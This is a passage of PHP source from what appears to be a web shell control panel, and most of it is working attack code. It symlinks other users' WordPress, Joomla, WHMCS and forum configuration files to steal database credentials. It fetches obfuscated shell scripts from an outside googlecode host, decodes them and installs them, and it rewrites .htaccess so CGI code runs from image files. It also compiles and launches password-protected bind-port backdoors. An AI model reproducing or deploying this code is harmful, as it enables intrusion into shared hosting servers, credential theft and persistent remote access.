2108 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2109 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2110 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2111 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2112 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config/koneksi.php','tmp/'.$etcc[0].'-Lokomedia.txt');
2113 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/konfigurasi/koneksi.php','tmp/'.$etcc[0].'-Formulasi.txt');
2114 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/lib/config.php','tmp/'.$etcc[0].'-Balitbang.txt');
2115 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','tmp/'.$etcc[0].'-PhpBB.txt');
2116 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','tmp/'.$etcc[0].'-vBulletin.txt');
2117 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2118 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2119 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2120 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2121 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2122 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2123 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2124 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2125 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2126 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2127 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2128 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2129 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2130 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
2131 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','tmp/'.$etcc[0].'-IPB.txt');
2132 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','tmp/'.$etcc[0].'-MyBB.txt');
2133 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','tmp/'.$etcc[0].'-SMF.txt');
2134 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','tmp/'.$etcc[0].'-Drupal.txt');
2135 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','tmp/'.$etcc[0].'-e107.txt');
2136 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','tmp/'.$etcc[0].'-Seditio.txt');
2137 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','tmp/'.$etcc[0].'-osCommerce.txt');
2138 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2139 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2140 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2141 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2142 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2143 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2144 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2145 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2146 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2147 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2148 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2149 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2150 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
2151 }
2152 function chk_header($link) {
2153 $tmp=get_headers($link,1);
2154 if(strpos($tmp[0],"200")) {
2155 return true;
2156 }
2157 else {
2158 return false;
2159 }
2160 }
2161 function Find($str,$start,$end) {
2162 $len=strlen($str);
2163 $start_pos=(strpos($str,$start)+strlen($start));
2164 $str=substr($str,$start_pos);
2165 $end_pos=strpos($str,$end);
2166 $str=substr($str,0,$end_pos);
2167 return $str;
2168 }
2169 $pageURL='http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
2170 $u=explode("/",$pageURL);
2171 $pageURL=str_replace($u[count($u)-1],"",$pageURL);
2172 function cms_add($link,$domain,$owner,$cms) {
2173 $link=$link.'-'.$cms.'.txt';
2174 if(chk_header($link)) {
2175 $url='http://'.$domain;
2176 $str='<tr><td><a href='.$url.' target="_blank">'.$domain.'</a></td><td>'.$owner.'</td><td align="center"><a
2177href='.$link.' target="_blank" class="gaya">'.$cms.'</td>'.Chr(10);
2178 file_put_contents("tmp.tmp",$str,FILE_APPEND);
2179 echo $str;
2180 }
2181 }
2182 function CurlPage($url,$post=null,$head=true) {
2183 $ch=curl_init();
2184 curl_setopt($ch,CURLOPT_URL,$url);
2185 curl_setopt($ch,CURLOPT_HEADER,$head);
2186 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
2187 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2188 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
2189 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
2190 curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
2191 curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");
2192 curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");
2193 If($post!=NULL) {
2194 curl_setopt($ch,CURLOPT_POST,1);
2195 curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
2196 }
2197 $urlPage=curl_exec($ch);
2198 if(curl_errno($ch)) {
2199 echo curl_error($ch);
2200 }
2201 curl_close($ch);
2202 return($urlPage);
2203 }
2204 function listall($file,$str) {
2205 if(file_exists($file)) {
2206 $do=file_get_contents($file);
2207 if(!strpos($do,$str)) {
2208 file_put_contents($file,$str,FILE_APPEND);
2209 }
2210 }
2211 else {
2212 file_put_contents($file,$str,FILE_APPEND);
2213 }
2214 }
2215 echo "<br/><center>[Cms] : <span class='gaya'>Symlink With Cms Detector</span> <a href='?x=cms&do=detect' class='no'><button class='inputzbut'>Symlink</button></a><br/>";
2216 if(($_GET['x']=='cms')&&($_GET['do']=='detect')) {
2217 if(!file_exists('tmp.tmp')) {
2218 @fopen('tmp.tmp','w');
2219 echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0'>";
2220 echo "<thead><th>Domains</th><th>Users</th><th style='width:70px;padding:0px;'>Symlink</th></thead>";
2221 $p=0;
2222 if(is_readable("/var/named")) {
2223 $list=scandir("/var/named");
2224 $current_dir=posix_getcwd();
2225 $dir=explode("/",$current_dir);
2226 foreach($list as $domain) {
2227 if(strpos($domain,".db")) {
2228 $domain=str_replace('.db','',$domain);
2229 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
2230 error_reporting(0);
2231 $link=$pageURL.'tmp/'.$owner['name'];
2232 cms_add($link,$domain,$owner['name'],"WordPress");
2233 cms_add($link,$domain,$owner['name'],"Joomla");
2234 cms_add($link,$domain,$owner['name'],"vBulletin");
2235 cms_add($link,$domain,$owner['name'],"WHMCS");
2236 cms_add($link,$domain,$owner['name'],"PhpBB");
2237 cms_add($link,$domain,$owner['name'],"MyBB");
2238 cms_add($link,$domain,$owner['name'],"IPB");
2239 cms_add($link,$domain,$owner['name'],"SMF");
2240 cms_add($link,$domain,$owner['name'],"Drupal");
2241 cms_add($link,$domain,$owner['name'],"e107");
2242 cms_add($link,$domain,$owner['name'],"Seditio");
2243 cms_add($link,$domain,$owner['name'],"osCommerce");
2244 }
2245 }
2246 }
2247 }
2248 else {
2249 echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0'>";
2250 echo "<thead><th>Domains</th><th>Users</th><th style='width:70px;padding:0px;'>Symlink</th></thead>";
2251 $content=file_get_contents($pageURL.'tmp.tmp');
2252 echo $content;
2253 }
2254 echo "<tr><th colspan='3'><a href='".$pageURL."tmp' target='_blank' class='no'><button class='inputzbut'>View Symlink</button></a><a href='?x=cms&do=cancms' class='no'><button class='inputzbut'>Cancel Symlink</button></a></th></tr></table></div>";
2255 }
2256 if(($_GET['x']=='cms')&&($_GET['do']=='cancms')) {
2257 if(file_exists('tmp.tmp')) {
2258 @unlink('tmp.tmp');
2259 @exe('rm -r tmp');
2260 }
2261 }
2262}
2263elseif(isset($_GET['x'])&&($_GET['x']=='port')) {
2264 echo "<br/><center style='-webkit-margin-before:20px;'>";
2265 echo "[URL] : <a href='http://".$server_ip.":13123' target='_blank' class='gaya' id='aisi'>http://".$server_ip.":13123</a>";
2266 echo '<form method="post"><table class="tabnet"><tr><th colspan="4">Symlink Port</th></tr><tr><td>Port : </td><td><input size="35" name="portname" type="numeric" value="13123" class="inputz" onkeypress="ganti()" id="portname" style="width:100;"></td><td><select name="pilihport" class="inputz"><option value="pl">Perl</option><option value="py">Python</option></select></td><td><input class="inputzbut" type="submit" name="symport" value="Symlink" /></td></tr></table></form>';
2267 $np=$_POST['portname'];
2268 if(isset($_POST['symport'])) {
2269 $ats=gzinflate(str_rot13(base64_decode('RknULy0u0kLKzNNCzStGKKgsycjP4+XKzC3ILypECAbSOakeISEBwalScqlSCIn85OzUEjTB/G9eLgA=')));
2270 $bwh=gzinflate(str_rot13(base64_decode('co4xeMMwEIXnBvIfDi9JVZBqgacumU9VvAvFvmDRS0VB1yo/P5IwtNDxHve993o39g5NO7Og1n3fd70Y67Rh1Wnz4aMc58mSdbtpl++jZNMDCW242iU88DgM5yvSD5L8DS74/MbI62Kmc+YwFcaPX8jr//C5kk80zQGCJ94dYIXKSSDrSzQnn8AHZ8CzjRArAt5OwtuNfMoBGK44KHVgD5FW1LY/JfgyxUFORERdl0WSuSBNUzn6Uv3jqrKsePruCYt0zt8=')));
2271 $pt="port = ".$np;
2272 $r=$ats.$pt.$bwh;
2273 switch($_POST['pilihport']) {
2274 case 'pl':
2275 $f=fopen('port.pl','w');
2276 fwrite($f,$r);
2277 echo "<span class='gaya'>[</span> <a href='http://".$server_ip.":".$np."' target='_blank'>DONE</a> <span class='gaya'>]</span>";
2278 @exe('perl port.pl');
2279 break;
2280 case 'py':
2281 $f=fopen('port.py','w');
2282 fwrite($f,$r);
2283 echo "<span class='gaya'>[</span> <a href='http://".$server_ip.":".$np."' target='_blank'>DONE</a> <span class='gaya'>]</span>";
2284 @exe('python port.py');
2285 break;
2286 }
2287 }
2288}
2289elseif(isset($_GET['x'])&&($_GET['x']=='db')) {
2290 ?>
2291<form action="?y=<?php echo $pwd;?>&x=db" method="post" style="-webkit-margin-before:20px;">
2292<?php
2293echo "<br/><center>";
2294 $dbshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/db.php');
2295 $dbshellcss=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/db.css');
2296 mkdir('db',0755);
2297 chdir('db');
2298 $file=fopen("db.php","w+");
2299 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($dbshell)))));
2300 fclose($file);
2301 $file2=fopen("db.css","w+");
2302 $write2=fwrite($file2,gzinflate(base64_decode(str_rot13(strrev($dbshellcss)))));
2303 fclose($file2);
2304 chmod("db.php",0644);
2305 chmod("db.css",0644);
2306 echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/db/db.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/db/db.php</a>";
2307 if(isset($_POST['candb'])) {
2308 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='insdb'/></form>";
2309 chdir('db');
2310 if(file_exists('db.php')) {
2311 @unlink('db.php');
2312 @unlink('db.css');
2313 chdir('..');
2314 @rmdir('db');
2315 }
2316 }
2317 else {
2318 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='candb'/></form>";
2319 }
2320}
2321elseif(isset($_GET['x'])&&($_GET['x']=='mysql')) {
2322 ?>
2323<form action="?y=<?php echo $pwd;?>&x=mysql" method="post" style="-webkit-margin-before:20px;">
2324<?php
2325echo "<br/><center>";
2326 $sqlshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php');
2327 $file=fopen("sql.php","w+");
2328 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($sqlshell)))));
2329 fclose($file);
2330 chmod("sql.php",0644);
2331 echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/sql.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/sql.php</a>";
2332 if(isset($_POST['cansql'])) {
2333 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inssql'/></form>";
2334 if(file_exists('sql.php')) {
2335 @unlink('sql.php');
2336 }
2337 }
2338 else {
2339 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='cansql'/></form>";
2340 }
2341 echo "<br/><br/><iframe src=".$alamat."/sql.php width=97% height=580px frameborder=0></iframe></center></form>";
2342}
2343elseif(isset($_GET['x'])&&($_GET['x']=='cpanel')) {
2344 ?>
2345<form action="?y=<?php echo $pwd;?>&x=cpanel" method="post" style="-webkit-margin-before:20px;">
2346<?php
2347echo "<br/><center>";
2348 $cpshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/cp.php');
2349 $file=fopen("cp.php","w+");
2350 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($cpshell)))));
2351 fclose($file);
2352 chmod("cp.php",0644);
2353 echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/cp.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/cp.php</a>";
2354 if(isset($_POST['cancp'])) {
2355 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inscp'/></form>";
2356 if(file_exists('cp.php')) {
2357 @unlink('cp.php');
2358 }
2359 }
2360 else {
2361 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='cancp'/></form>";
2362 }
2363 echo "<br/><br/><iframe src=".$alamat."/cp.php width=97% height=580px frameborder=0 style='overflow-y:hidden;'></iframe></center></form>";
2364}
2365elseif(isset($_GET['x'])&&($_GET['x']=='whmcs')) {
2366 ?>
2367<form action="?y=<?php echo $pwd;?>&x=whmcs" method="post" style="-webkit-margin-before:20px;">
2368<?php
2369echo "<br/><center>";
2370 $whmshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/whm.php');
2371 $file=fopen("whm.php","w+");
2372 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($whmshell)))));
2373 fclose($file);
2374 chmod("whm.php",0644);
2375 echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/whm.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/whm.php</a>";
2376 if(isset($_POST['canwhm'])) {
2377 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inswhm'/></form>";
2378 if(file_exists('whm.php')) {
2379 @unlink('whm.php');
2380 }
2381 }
2382 else {
2383 echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='canwhm'/></form>";
2384 }
2385 echo "<br/><br/><iframe src=".$alamat."/whm.php width=97% height=575px frameborder=0 ></iframe></center></form>";
2386}
2387elseif(isset($_GET['x'])&&($_GET['x']=='ins')) {
2388 ?>
2389<form action="?y=<?php echo $pwd;?>&x=ins" method="post" style="-webkit-margin-before:35px;">
2390<?php
2391echo "<center>";
2392 echo "
2393<form action='".$pwd."&x=ins' method='post'>
2394<table class='tabnet'>
2395<tr>
2396<th colspan='3'>Install Shell</th>
2397</tr>
2398<tr>
2399<td>Name Folder</td><td>:</td><td><input class='inputz' type='text' name='insdir' value='cgi-bin'/></td>
2400</tr>
2401<tr>
2402<td>Name Shell</td><td>:</td><td><input id='wow' class='inputz' type='text' name='insname' value='shell.pl'/>
2403</td>
2404</tr>
2405<tr>
2406<td>Type Shell</td><td>:</td><td><select id='options' class='inputz' name='ins' onchange='optionCheck()'>
2407<option value='pl'>Perl</option>
2408<option value='py'>Python</option>
2409<option value='asp'>ASP</option>
2410<option value='aspx'>ASPX</option>
2411<option value='jsp'>JSP</option>
2412</select></td>
2413</tr>
2414<tr>
2415<th colspan='3'><input class='inputzbut' type='submit' name='installz' value='install'/></th>
2416</tr>
2417</table>
2418</form> ";
2419 $dirz=$_POST['insdir'];
2420 $namez=$_POST['insname'];
2421 $urlz=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd());
2422 $met="Options FollowSymLinks MultiViews Indexes ExecCGI
2423AddType application/x-httpd-cgi .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py
2424AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py
2425AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py";
2426 if(isset($_POST['installz'])) {
2427 if($dirz!='') {
2428 switch($_POST['ins']) {
2429 case 'pl':
2430 mkdir($dirz,0755);
2431 chdir($dirz);
2432 $tai=".htaccess";
2433 $sem="$tai";
2434 $sim=fopen($sem,'w')ordie("Error");
2435 fwrite($sim,$met);
2436 fclose($sim);
2437 $cgiz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.pl');
2438 $cgi=fopen($namez,"w+");
2439 $write=fwrite($cgi,gzinflate(base64_decode(str_rot13(strrev($cgiz)))));
2440 fclose($cgi);
2441 chmod($namez,0755);
2442 echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2443 break;
2444 case 'py':
2445 mkdir($dirz,0755);
2446 chdir($dirz);
2447 $tai=".htaccess";
2448 $sem="$tai";
2449 $sim=fopen($sem,'w')ordie("Error");
2450 fwrite($sim,$met);
2451 fclose($sim);
2452 $cgiz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.py');
2453 $cgi=fopen($namez,"w+");
2454 $write=fwrite($cgi,gzinflate(base64_decode(str_rot13(strrev($cgiz)))));
2455 fclose($cgi);
2456 chmod($namez,0755);
2457 echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2458 break;
2459 case 'asp':
2460 mkdir($dirz,0755);
2461 chdir($dirz);
2462 $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.asp');
2463 $aspx=fopen($namez,"w+");
2464 $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2465 fclose($aspx);
2466 chmod($namez,0755);
2467 echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2468 break;
2469 case 'aspx':
2470 mkdir($dirz,0755);
2471 chdir($dirz);
2472 $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.aspx');
2473 $aspx=fopen($namez,"w+");
2474 $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2475 fclose($aspx);
2476 chmod($namez,0755);
2477 echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2478 break;
2479 case 'jsp':
2480 mkdir($dirz,0755);
2481 chdir($dirz);
2482 $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.jsp');
2483 $aspx=fopen($namez,"w+");
2484 $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2485 fclose($aspx);
2486 chmod($namez,0755);
2487 echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2488 break;
2489 }
2490 }
2491 else {
2492 echo "<br/>Error Cannot Install <span class='guyu'>".$namez."</span>";
2493 }
2494 }
2495}
2496elseif(isset($_GET['view'])&&($_GET['view']!="")) {
2497 if(is_file($_GET['view'])) {
2498 if(!isset($file))
2499 $file=magicboom($_GET['view']);
2500 if(!$win&&$posix) {
2501 $name=@posix_getpwuid(@fileowner($folder));
2502 $group=@posix_getgrgid(@filegroup($folder));
2503 $owner=$name['name']." : ".$group['name'];
2504 }
2505 else {
2506 $owner=$user;
2507 }
2508 $owner=$user;
2509 $filn=basename($file);
2510 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($filn)."_form6\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldfile\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newfile\" value=\"".$pwd."copy_of_".$filn."\" /><input class=\"inputzbut\" type=\"submit\" name=\"copy\" value=\"copy\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form6');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($filn)."_form7\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldmove\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newmove\" value=\"".$pwd.$filn."\" /><input class=\"inputzbut\" type=\"submit\" name=\"move\" value=\"move\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form7');\" /></form></td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".substr(sprintf('%o',fileperms($file)),-4)." | ".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form6');\">copy</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form7');\">move</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
2511 if(isset($_GET['type'])&&($_GET['type']=='image')) {
2512 echo "<div style=\"text-align:center;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
2513 }
2514 elseif(isset($_GET['type'])&&($_GET['type']=='code')) {
2515 echo "<div class=\"viewfile\">";
2516 $file=wordwrap(@file_get_contents($file),"240","\n");
2517 @highlight_string($file);
2518 echo "</div>";
2519 }
2520 else {
2521 echo "<div class=\"viewfile\">";
2522 echo nl2br(htmlentities((@file_get_contents($file))));
2523 echo "</div>";
2524 }
2525 }
2526 elseif(is_dir($_GET['view'])) {
2527 echo showdir($pwd,$prompt);
2528 }
2529}
2530elseif(isset($_GET['edit'])&&($_GET['edit']!="")) {
2531 if(isset($_POST['save'])) {
2532 $file=$_POST['saveas'];
2533 $filed=basename($file);
2534 $content=magicboom($_POST['content']);
2535 $cp_file=$_POST['cp_file'];
2536 if($filez=@fopen($file,"w")) {
2537 $time=date("d-M-Y H:i",time());
2538 if(@fwrite($filez,$content))
2539 $msg="file saved <span class=\"gaya\">@</span> ".$time;
2540 else
2541 $msg="failed to save";
2542 @fclose($filez);
2543 if(isset($cp_file)) {
2544 $dir_open=opendir('.');
2545 while(false!==($filename=readdir($dir_open))) {
2546 if($filename!="."&&$filename!="..") {
2547 if(is_dir($filename)) {
2548 $link=$filename;
2549 copy($file,$pwd.$link."/".$filed);
2550 }
2551 }
2552 }
2553 closedir($dir_open);
2554 }
2555 }
2556 else
2557 $msg="permission denied";
2558 }
2559 if(!isset($file))
2560 $file=$_GET['edit'];
2561 if($filez=@fopen($file,"r")) {
2562 $content="";
2563 while(!feof($filez)) {
2564 $content.=htmlentities(str_replace("''","'",fgets($filez)));
2565 }
2566 @fclose($filez);
2567 }
2568 ?>
2569<form action="?y=<?php echo $pwd;?>&edit=<?php echo $file;?>" method="post"><br/><table class="cmdbox"><tr><td colspan="2"><textarea class="output" name="content"><?php echo $content;?></textarea><tr><td colspan="2">Save As <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:40%;" value="<?php echo $file;?>" /> <input type="checkbox" name="cp_file" /> Copy To All Sub Directories <input class="inputzbut" type="submit" value="Save !" name="save" /> <?php echo $msg;?></td></tr></table></form>
2570<?php
2571}
2572elseif(isset($_GET['x'])&&($_GET['x']=='netsploit')) {
2573 echo "<center style='-webkit-margin-before:35px;'>";
2574 if(isset($_POST['bind'])&&!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='C')) {
2575 $port=trim($_POST['port']);
2576 $passwrd=trim($_POST['bind_pass']);
2577 tulis("bdc.c",$port_bind_bd_c);
2578 exe("gcc -o bdc bdc.c");
2579 exe("chmod 777 bdc");
2580 @unlink("bdc.c");
2581 exe("./bdc ".$port." ".$passwrd." &");
2582 $scan=exe("ps aux");
2583 if(eregi("./bdc $por",$scan)) {
2584 $msg="<p>Process found running, backdoor setup successfully.</p>";
2585 }
2586 else {
2587 $msg="<p>Process not found running, backdoor not setup successfully.</p>";
2588 }
2589 }
2590 elseif(isset($_POST['bind'])&&!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='Perl')) {
2591 $port=trim($_POST['port']);
2592 $passwrd=trim($_POST['bind_pass']);
2593 tulis("bdp",$port_bind_bd_pl);
2594 exe("chmod 777 bdp");
2595 $p2=which("perl");
2596 exe($p2." bdp ".$port." &");
2597 $scan=exe("ps aux");
2598 if(eregi("$p2 bdp $port",$scan)) {
2599 $msg="<p>Process found running, backdoor setup successfully.</p>";
2600 }
2601 else {
2602 $msg="<p>Process not found running, backdoor not setup successfully.</p>";
2603 }
2604 }
